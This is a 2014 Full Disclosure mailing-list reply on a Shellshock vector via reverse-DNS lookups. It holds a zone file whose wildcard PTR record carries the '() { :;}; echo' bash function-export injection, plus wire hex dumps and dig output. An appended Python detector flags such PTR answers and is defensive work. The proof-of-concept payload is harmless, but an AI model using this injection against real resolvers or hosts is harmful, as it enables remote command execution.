Full Disclosure mailing list archives
Re: CVE-2014-3671: DNS Reverse Lookup as a vector for the Bash vulnerability (CVE-2014-6271 et.al.)
From: Dirk-Willem van Gulik <dirkx () webweaving org>
Date: Tue, 14 Oct 2014 15:45:34 +0100
On 14 Oct 2014, at 13:04, Florian Weimer <fw () deneb enyo de> wrote:
>> A simple zone file; such as:
>>
>>     $TTL 10;
>>     $ORIGIN in-addr.arpa.
>>     @ IN SOA ns.boem.wleiden.net dirkx.webweaving.org (
>>             666 ; serial
>>             360 180 3600 1800 ; very short lifespan.
>>             )
>>     IN NS 127.0.0.1
>>     * PTR "() { :;}; echo CVE-2014-6271, CVE-201407169, RDNS"
>
> I'm surprised DNS servers grok this, should be
>
>     * IN PTR \(\)\032\{\032:\;\}\;\032echo\032CVE-2014-6271\,\032CVE-201407169\,\032RDNS.
>
> Or something similar.
The production versions of NSD accept this fine ‘as is’ (FreeBSD-9.3); bind requires a bit of careful escaping. On the wire one then sees the raw ‘binary’ — which can indeed be very raw:

    000001d0  XX XX XX XX 31 28 29 20 7b 20 3a 3b 7d 3b 20 65  () { :;}; e|
    000001e0  63 68 6f 20 63 76 65 2d 32 30 31 34 2d 36 32 37  |cho cve-2014-627|
    000001f0  31 2c 20 63 76 65 2d 32 30 31 34 30 37 31 36 39  |1, cve-201407169|
    00000200  2c 20 72 64 6e 73 c0 14 c0 XX XX XX XX XX XX XX  |, rdns

And once you push this through DIG - one sees:

    4.3.2.1.in-addr.arpa. 10 IN PTR \(\)\032{\032:\;}\;\032echo\032cve-2014-6271,\032cve-201407169,\032rdns.in-addr.arpa.

depending on your escaping (which normal unix libc/resolve does). And then we found at least one setenv() which would *de-escape* above nicely - getting the octal and decimal right.

Dw.

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
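Added example, not part of this thread or its author's code: a small Python check that undoes the RFC 1035 presentation-format escaping seen in the dig output above (\DDD decimal bytes and \X literal characters, the same transformation a de-escaping setenv() path performs) and flags PTR answers whose decoded text carries the "() {" function-export marker, so reverse-lookup results can be screened before they reach an environment variable. The dig-style lines, including the benign second record, are constructed samples.

```python
import re

# Constructed sample lines in the format dig prints (owner, TTL, class, type, rdata).
# The first carries the escaped marker from the thread; the second is a benign record.
SAMPLE_DIG_LINES = [
    r"4.3.2.1.in-addr.arpa. 10 IN PTR \(\)\032{\032:\;}\;\032echo\032cve-2014-6271,\032cve-201407169,\032rdns.in-addr.arpa.",
    r"5.3.2.1.in-addr.arpa. 10 IN PTR host-5.example.net.",
]

# Marker of an exported bash function definition: "()" followed by "{".
SHELLSHOCK_MARKER = re.compile(r"\(\)\s*\{")


def unescape_presentation(name: str) -> str:
    """Decode RFC 1035 presentation-format escapes in a domain name.

    "\DDD" is a byte given as three decimal digits (e.g. \032 is a space);
    "\X" is the literal character X (used for '(', ')', ';', '.', ...).
    """
    out = []
    i = 0
    while i < len(name):
        c = name[i]
        if c == "\\" and i + 1 < len(name):
            m = re.match(r"\d{3}", name[i + 1:i + 4])
            if m:
                out.append(chr(int(m.group(0))))
                i += 4
                continue
            out.append(name[i + 1])
            i += 2
            continue
        out.append(c)
        i += 1
    return "".join(out)


def looks_like_shellshock(ptr_text: str) -> bool:
    """True if the decoded PTR target contains the "() {" function-export marker."""
    return SHELLSHOCK_MARKER.search(unescape_presentation(ptr_text)) is not None


def scan_ptr_lines(lines):
    """Return the owner names of PTR records whose target matches the marker."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) >= 5 and parts[2] == "IN" and parts[3] == "PTR":
            if looks_like_shellshock(parts[4]):
                hits.append(parts[0])
    return hits


if __name__ == "__main__":
    for owner in scan_ptr_lines(SAMPLE_DIG_LINES):
        print("suspicious PTR for", owner)
```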